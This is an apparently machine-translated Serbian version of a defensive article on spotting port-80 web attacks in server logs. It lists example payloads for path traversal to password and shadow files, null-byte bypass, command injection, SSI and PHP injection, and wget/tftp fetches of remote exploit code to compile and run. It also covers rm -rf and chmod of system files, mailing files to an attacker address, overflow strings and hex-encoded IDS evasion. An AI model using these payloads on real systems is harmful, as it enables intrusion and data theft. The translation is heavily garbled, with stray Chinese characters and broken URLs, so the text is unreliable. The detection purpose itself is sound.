И Резиме
ИИ детаљан опис.
ИИИ Даље.
ИВ Спилловер анализа.
В. транскодовање
ВИ Закључак.
[Извод]
сајт 80 као лука подразумевана услуга, то је све о издању безбедносних проблема би неке од тих пропуста омогућава нападачу да приступи систему и администраторска права да уђе у сам сајт, следеће је 80 лука Зеноморпх нападе на неке од трагова истраживања, а ви реците како да пронађете проблеме из дневника записа.
[Детаил]
Овде у делу кроз ии Кси Лие Зи, показују и 其 апликације веб сервера на генерализоване нападе и друге ознаке лево од зхе Кси Лазес Зи Јин Јин напада представљају главни пут, постоји списак свих облика напада, овај део ће детаљан опис улоге сваки напад, и како искористити ове рањивости за напад.
(1) "" "..." И "..." захтев
Трагови ових напада су веома честе на уеб апликација и уеб сервера, који се користи да дозволи нападачу или црв-вирус програм да промените путању веб сервера, да би се приступило затворене области. Већина ЦГИ програми са ове мане, ".." захтев.
Пример:
хттп://хост/цги-бин/ламе.цги?филе=../../../../етц/мотд
Ово показује нападач Лиези захтев мосд ову датотеку, ако је нападач могућност пробоја веб сервер роот директоријум, а затим добили више информација и да добију додатне привилегије.
(2) "% 20" захтев
20% је хексадецимално вредност која 16 места, иако то не значи да можете користити било шта, али када видите дневник, наћи ће га, неки веб сервер апликација на овај знак може да се ефикасно спроводе Стога, пажљиво прегледате дневник. С друге стране, захтев може понекад помоћи да извршите неке команде.
Пример:
хттп://хост/цги-бин/ламе.цги?паге=лс% 20-ал |
Ова Лиези показује нападачу да изврши Уникс команду, наводи цео каталог докумената захтева, изазивајући нападачу да приступ важним датотекама на вашем систему, да му помогну да додатно обезбеди услове за добијање привилегија.
(3) "% 00" захтев
00%, рекао је 16-бајт хексадецимални празан, он је успео да превари уеб апликација, као и захтев за различите врсте фајлова.
Примери:
хттп://хост/цги-бин/ламе.цги?паге=индек.хтмл
Ово може да буде валидан захтев машина, ако нападач свестан овог захтева била успешна, он даље ће тражити ЦГИ процедуре.
хттп://хост/цги-бин/ламе.цги?паге=../../../../етц/мотд
Можда је ЦГИ програм не прихвати овај захтев, јер је захтев да провери датотеку суфикс имена, као што су: хтмл.схтмл или друге типове датотека. Већина програма ће вам рећи тражили тип датотеке није исправна, овог пута то ће рећи захтеве нападача фајл мора бити карактер типа датотеке суфикс, тако да нападач може добити путем система, име датотеке, што доводи до ваш систем више осетљиве информације
хттп://хост/цги-бин/ламе.цги?паге=../../../../етц/мотд% 00хтмл
Пажњу на овај захтев, он ће преварити ЦГИ програм који овог документа је да утврди прихватљивих типова датотека, неке апликације ефикасне инспекције као глуп захтев за фајл који се обично користи методе нападача.
(4) "|" захтев
Ово је знака, у Уник систему, захтев за помоћ у спровођењу неколико системских команди истовремено.
Пример:
# Мачка аццесс_лог | греп-и ".."
(Ова команда ће приказати пријавите у ".." захтева се најчешће користе у нападима и црви нашао)
Често наћи да се многи веб апликација користите овај знак, то такође доводи до лажних аларма у ИДС логове.
У пажљиво испитивање ваш захтев, тако да је предност смањење лажних аларма у системима за детекцију упада.
Овде су неке од Лиех-тзу:
хттп://хост/цги-бин/ламе.цги?паге=../../../../бин/лс |
Овај захтев команди, следеће су неке промене у Лиези
хттп://хост/цги-бин/ламе.цги?паге=../../../../бин/лс% 20-ал% 20/етц |
Овај захтев је наведен у Уник систему / итд каталог свих фајлова
хттп://хост/цги-бин/ламе.цги?паге=цат% 20аццесс_лог | греп% 20-и% 20 "Хром"
Мачка команда извршење захтева и имплементацију греп команда ће, такође, проверити "Хром"
(5) ";" захтев
У Уникс система, овај лик омогућава да више командне линије извршења
Пример:
# ИД, унаме-а
(Примена ИД команду, а затим спровођење унаме команду)
Неки веб програм са овог лика, може довести у ИДС логове упозорење од неуспеха, пажљиво проверите своје веб програма, тако да можете смањити ризик од неуспеха ИДС обавештења.
(6) " " и " " Захтев за
Требало би да проверите своје дневнике запис два знака, из више разлога, први је знак да се додаје податке у документу
Пример 1:
# Ецхо "свој хак0ред Х0 Х0" / етц / мотд (мотд захтев писане информације у овом документу)
Нападач може лако користити захтев као горе поиграва са Ваше веб странице. Као што је чувени РДС искористи нападач се често користи за промену веб страницу.
Пример 2:
хттп://хост/сометхинг.пхп=Хи% 20мом% 20Им% 20Болд!
Хтмл ћете приметити да је језик знакова овде, он је такође провео " "," " карактера, такви напади не могу да проузрокују нападачу да приступи систему, она збуњена људи мисле да је ово легитиман сајт информација (што доводи до Људи посетите овај линк да посетите нападачу да поставите адресу, овај захтев може бити кодирана у 16 карактера хексадецималном запису, тако да трагови напада није толико очигледна)
(7) "Захтев!
Заједнички језик о овом карактер захтева СС (Сервер Сиде Инцлуде) сам напад, ако нападач је нападач збунити корисник кликне на везу скуп, и исто као горе.
Пример:
хттп://хост1/сометхинг.пхп =
Лиех-тзу је нападач може да у датотеци на локацији хост2 из хост1 се појављује изнад (наравно, неопходно је да посетиоце да посете подешавања нападача везе Овај захтев може да буде претворена у. 16 хек кодирање маска, није лако наћи)
У исто време, овај приступ може да изврши команду сајт овлашћења уеб
Пример:
хттп://хост/сометхинг.пхп =
Лиех-радити на удаљеном систему "ид" команду, она ће се приказати ИД веб сајт корисника, обично је "нико" или "ввв"
Овај образац омогућава укључене скривене датотеке.
Пример:
хттп://хост/сометхинг.пхп =
Скривене датотеке хтпассвд. Неће бити приказан, Апацхе ће одбити да се успостави таква правила да ХТ. Образац захтева, као и ССИ логотип ће заобићи таква ограничења, и довести до безбедносних проблема
(8) "," Захтев за
Такви напади се користе да покуша да даљински убаците ПХП веб апликација процедура, може дозволити извршења налога, у зависности од подешавања сервера, и других фактора на раду (као што је ПХП је постављена на сигуран начин)
Пример: хттп://хост/сометхинг.пхп = пасстхру ("ид ");?
У неким једноставна ПХП апликацију, она може бити на веб сите на даљинском права корисника система да обављају локалне команде
(9) "" "захтев
Овај лик је касније користи за извршавање команди у Перл, ликови у уеб апликација често не користе, па ако га видите у свој дневник, треба бити веома опрезан
Пример:
хттп://хост/сометхинг.цги = `ид`
Напишите перл ЦГИ програм у питање довести до спровођења ид команду
[Даље]
Следећем одељку ће се расправљати о примени више напада могао команда, заједно са документима тражили, и ако имате даљинско извршавање команде грешка, требало би да буде како да проверите откриће. Овај део је само да вам дати добру идеју, и реци систем шта се дешава, нападачи покушавају да нападну своје трагове систем, али не приказује све нападачу да користите команде и захтева.
"/ Бин / лс"
Ова команда захтева целу путању, у многим програмима уеб 应用 су овај недостатак, ако се пријавите на многим местима такав захтев, могуће је за велике удаљености Зхикинг команде рањивост, али не нужно проблем може бити лажна узбуна. Још једном је подсетио, веб апликације писане (ЦГИ, АСП, ПХП итд ...) је основ безбедности
Пример:
хттп://хост/цги-бин/бад.цги?дох=../../../../бин/лс% 20-ал |
хттп://хост/цги-бин/бад.цги?дох=лс% 20-ал;
"Цмд.еке"
Ово је прозора љуске, ако је нападачу да приступите и покренете ову скрипту у подешавања сервера, под условима дозвољено машина прозори могу учинити ништа, пуно црва је преко порта 80, комуникација са удаљеним машине
хттп://хост/сцриптс/сометхинг.асп=../../ВИННТ/систем32/цмд.еке?дир+е:
"/ Бин / ср"
То је две бинарне датотеке, његових проблема и / бин / лс, као, ако се пријавите на многим местима такав захтев, велики даљинско извршавање команди могуће је рупа, то није нужно проблем може бити лажна узбуна.
То ће показати који део припада којој групи корисника и
Пример:
хттп://хост/цги-бин/бад.цги?дох=../../../../бин/ид |
хттп://хост/цги-бин/бад.цги?дох=ид;
"/ Бин / РМ"
Ова команда може да брише фајлове без правилну употребу веома опасна
Примери:
хттп://хост/цги-бин/бад.цги?дох=../../../../бин/рм% 20% 20-рф * |
хттп://хост/цги-бин/бад.цги?дох=рм% 20-рф% 20 *;
"Вгет и тфтп" команду
Ове команде се често нападач може да добије додатне привилегије за преузимање датотека, вгет је Уникс команду испод, може да се користи за преузимање бацкдоор, ТФТП је под командом Уникс и НТ, се користи за преузимање датотеке. Неки ИИС црви се шире тфтп да копирате вируса са другим војскама
Примери:
хттп://хост/цги-бин/бад.цги?дох=../../../../патх/то-вгет/вгет% 20хттп: / / хост2/Пхантасмп.ц | хттп: / / домаћин / цги-бин / бад.цги ДОХ = вгет% 20хттп: / / ввв.хва-сецурити.нет/Пхантасмп.ц;
"Мачка" команду
Ова команда се користи за приказ садржаја датотеке, користити да прочитате важне информације, као што су конфигурационе датотеке, лозинку датотеке, кредитне датотека и докумената које се можете сетити
Примери: хттп://хост/цги-бин/бад.цги?дох=../../../../бин/цат% 20/етц/мотд | хттп://хост/цги-бин/ бад.цги ДОХ =? мачка% 20/етц/мотд;
"Ехо" команду
Ова команда се користи за писање података у фајл, као што су "индек.хтмл"
Примери: хттп://хост/цги-бин/бад.цги?дох=../../../../бин/ецхо% 20 "фц-# кивија% 20вас% 20хере"% 20 % 200даи.ткт | хттп://хост/цги-бин/бад.цги?дох=ецхо% 20 "фц-# кивија% 20вас% 20хере"% 20 200даи.ткт%;
"ПС" команду
Листе тренутно приказују процес, реците да је нападач удаљеним домаћин ради софтвер како би добили неке идеје о безбедносним питањима, да добију додатне дозволе
Примери: хттп://хост/цги-бин/бад.цги?дох=../../../../бин/пс% 20-аук | хттп://хост/цги-бин/бад. ЦГИ ДОХ = пс% 20-аук?;
"Убијте и киллалл" команду
Уник системима у циљу да се убије тај процес, нападач може да користи ову команду да зауставите систем услуга и процеси могу избрисати трагове нападача, неки експлоатишу ће произвести пуно детета процеса
Примери: хттп://хост/цги-бин/бад.цги?дох=../бин/килл% 20-9% 200 | хттп://хост/цги-бин/бад.цги?дох=килл% 20 -9% 200;
"Унаме" команду
Ова команда говори нападача удаљене машине име, за неко време, преко овог веб сајта, како би се знати који ИСП, нападача који могу посетио је данас. Унаме-а да ради нормално, захтев, то ће бити забележена у лог фајл
Примери: хттп://хост/цги-бин/бад.цги?дох=../../../../бин/унаме% 20-| хттп://хост/цги-бин/бад. ЦГИ ДОХ =? унаме% 20-;
"Цц", ГЦЦ, Перл, Питхон, итд ... "компилација / тумачење командне
Нападач преко вгет или ТФТП преузимање експлоатишу и користе ццм, ГЦЦ компајлер да компајлира ово у извршни програм, као и даљи приступ привилегије
Примери: хттп://хост/цги-бин/бад.цги?дох=../../../../бин/цц% 20Пхантасмп.ц | хттп://хост/цги-бин/бад. ЦГИ ДОХ? = гцц% 20Пхантасмп.ц; / а.оут% 20% 2031337-п.
Ако видите логове наћи у "Перлу" питон "Ова упутства могу бити удаљени нападачу да преузмете Перл, Питхон скрипту, и покушао да бисте добили привилегије од локалних
"Пошта" команду
Нападачи често користе ову команду систему, неке важне документе сопствене поштанско сандуче нападача, али и спремни на е-маил бомбашке нападе спроводе се
Примери: хттп://хост/цги-бин/бад.цги?дох=../../../../бин/маил% 20аттацкер@фуцкцнхонкер.орг% 20
2.168.22.1;
"Цховн, цхмод, цхгрп, цхсх, итд ..." и остале команде
Уник системима у циљу да им се дозволи да промените дозволе за датотеку
цховн = омогућава подешавање датотеке власник цхмод = дозвољава да поставите дозволе за датотеку цхгрп = дозвољава власнику да промените дозволе на датотекама групе цхсх = дозвољено да мењају шкољке корисника
Примери: хттп://хост/цги-бин/бад.цги?дох=../../../../бин/цхмод% 20777% 20индек.хтмл | хттп://хост/цги-бин/ бад.цги ДОХ =? цхмод% 20777% 20индек.хтмл; хттп://хост/цги-бин/бад.цги?дох=../../../../бин/цховн% 20зено% 20 / етц / мастер.пассвд | хттп://хост/цги-бин/бад.цги?дох=цхсх% 20/бин/сх; хттп://хост/цги-бин/бад.цги?дох=../. / .. /. .. / бин / цхгрп% 20нободи% 20/етц/схадов |
"/ Етц / пассвд" фајл
Ово је лозинка фајл система, обично ван сенке, и не дозвољава да види шифровану лозинку, али за нападача који може знати шта је валидан корисника и апсолутну путању система, име сајта и остале информације, као што се обично од сенка искључен, тако да нападач ће нормално видети / етц / схадов фајл
"/ Етц / мастер.пассвд"
Ова датотека је БСД система лозинку датотека садржи шифровану лозинку фајл на роот налога је само само за читање, а неки неквалификовани нападача отворила његов покушај да се унутар прочитате садржај. Ако је веб сајт роот привилегије за покретање, а затим је нападач је, можемо прочитати у садржај, доста проблема на администратор система ће доћи један по један
"/ Етц / схадов"
Садржи шифровану лозинку систем, прочитајте на исти роот налога, а / ет / мастер.пассвд готово
"/ Етц / мотд"
Када корисници пријавите у Уник систему, информација се појављује у "Порука дана" фајл, пружа важне информације и систем администратор корисника неког скупа, корисници који желе да виде оне који нису, садржи и систем за информације о верзији, нападач обично види овај фајл, да разуме шта је систем покренут на нападача, следећи корак је да се тражи за овај тип система, експлоатацију и даљи приступ систему привилегија
"/ Етц / хостс"
Тај документ обезбеђује ИП адресу и мреже информација, нападач може да сазнате више о мрежи система подешавања
"/ Уср / лоцал / апацхе / цонф / хттпд.цонф"
Ово је Апацхе веб сервер конфигурациони фајл, нападач може да разуме, као што су ЦГИ, ССИ и друге информације доступне
"/ Етц / инетд.цонф"
Ово је конфигурациони фајл инетд сервиса, нападач може да научи удаљене машине, почетак ове услуге, било да користите омот за контролу приступа, ако је омот пронађена је покренут, нападач следећи корак ће проверити да ли "/ етц / хостс.аллов" и "/ етц / хостс.дени" фајл, и који може да промени неке параметре, приступне привилегије
". Хтпассвд. Хтаццесс и Хтгроуп."
Ове датотеке се обично користе у веб сајт аутентификацију корисника, нападач би видели ове фајлове, и добити корисничко име и лозинку, лозинку датотека хтпассвд. Је кодирана, пробијају неке једноставне дешифровања, дозволити нападачу да приступите сајту заштићеним подручјима (обично корисника са истим корисничко име и лозинку, нападач може чак да посетите друге рачун)
"Аццесс_лог и еррор_лог"
Ово су Апацхе сервера лог фајлове, нападачи често видели ове датотеке, поглед на те захтеве се снимају, те и другим захтевима за различитим местима
Типично, нападач мењати ове лог фајлове, као што су своје информације о адреси за напад на луку преко 80 прекида ваш систем и систем има да не чинећи посао резерва је, нико други систем за снимање 状况 снимање процедуре, који ће детекција упада постаје веома тешко да раде
"[Дриве-писмо]: виннтрепаирсам._ или [ознака диск јединице]: виннтрепаирсам"
Виндовс НТ систем датотека лозинке, ако је даљински команде не могу бити примењене, нападачи обично захтева ових докумената, а затим "л0пхт прасак" на врсту лозинку крекинг алата за прасак, ако је нападач покуша да нападне датотеке лозинку администратора уколико успе онда удаљене машине ће се нападач добије контролу
[Оверфлов анализе]
Нећу рећи превише у овом чланку на тему вишак, ја ћу цитирати за илустрацију ових појава и трагове пажње и од посебне важности, често нападају нападача кроз тампон транскодовање и други начини да се постигне тешко пронаћи
Овде је једноставан Лазес Ци
Пример: хттп://хост/цги-бин/хелловорлд?типе=ААААА АААААААААААААААААААААААААААААААААААААА АААААААААААААААААААААААААААААА ААААААААААААААААААААААААААААА ааааааааа ААААААААААААААААААААААААААААА ААААААААААААААААААААААААААААА аааааааааа аааааааааа ААААААААААААААААААААААААААААА ААААААААААААААААААААААААААААА ААААААААААААААААААААААААААААА ААААААААААААААААААААААААААААА аааааааааа аааааааааа ААААААААААААААААААААААААААААА ААААААААААААААААААААААААААААА ААААААААААААААААААААААААААААА АА
Ово Лиези показује нападача на апликацију за слање пуно карактера, да тестирате програм буффер оверфлов буффер оверфлов могу добити неког дозволе команду извршење домаћин, ако власник има сетуид и процедуре за роот, кроз вишак, могу добити приступ на цео систем, ако не као сетуид програма, а затим вишак само тако што ћете покренути на сајту корисничка права
Овде се не може рећи све околности, али требало би редовно да проверите лог датотеку, ако тај дан изненада нашао пуно захтева, али обично не више од захтева, то показује да сте изложени преливање нападе, наравно, могу бити нова мрежа црв напада
[Транскодовање]
Захтев поменуто свих напада, нападач познат ИДС системи често редовне механичких провере ове захтеве, нападач ће често бити кодирана конверзије Гонга Јујианг тражили садржај претворен у 16-бенд Г Ши, Тао Зхи ИДС ће Хулуе ове захтеве, Ми смо упознати са ЦГИ рањивост скенирање алат који је добар Лиези погодак. Ако погледате дневник времена нашао велики број 16-бенд, а не неке уобичајене знакове, а затим је нападач може покушати да користите неке од начина да се напад систем
Брз начин је ваша датотека дневника захтев за оне који су 16 хексадецимално, копирајте га на свој прегледач, претраживач се може претворити у праву захтев, и приказује садржину захтева, ако не храбрости да се овај ризик, једноставан човек АСЦИИ, може да вам пружи тачан број.
[Закључак]
Овај чланак не могу да покрију сва 80 порта напада, али већина је цитирано више него општи напад, и рећи ће вам како да проверите лог фајлове, и како да додате као што су број ИДС правила, пише њен циљ је да Веб администратор система треба да се забрину о томе шта је добро у исто време, надам се да овај чланак помаже да се веб програмери програма веб пишу боље програме
НА НАПОМЕНА: Ако имате било каквих коментара и сугестија, молимо Вас да пошаљете е-маил админ@цгисецурити.цом.